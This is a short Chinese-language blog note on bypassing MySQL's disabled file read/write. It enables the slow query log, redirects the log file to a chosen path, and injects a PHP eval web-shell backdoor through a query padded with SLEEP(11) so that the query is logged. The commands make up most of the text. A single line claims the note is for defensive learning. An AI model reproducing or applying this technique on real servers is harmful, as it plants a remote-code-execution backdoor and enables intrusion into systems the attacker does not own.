【笔记】Mysql禁用读写绕过

发表于 更新于 阅读次数:

前言

Mysql禁用读写绕过

本文仅用于网络信息防御学习

正文

  • 启用满日志记录

<dir>:日志存储路径,作为Shell命令执行路径

1
2
SET GLOBAL SLOW_QUERY_LOG = 1;
SET GLOBAL SLOW_QUERY_LOG_FILE = '<dir>';
  • 向日志内写入后门
1
SELECT '<?php eval($_REQUEST['<pwd>']);?>' OR SLEEP(11);

完成

参考文献

哔哩哔哩——逆风微笑的代码狗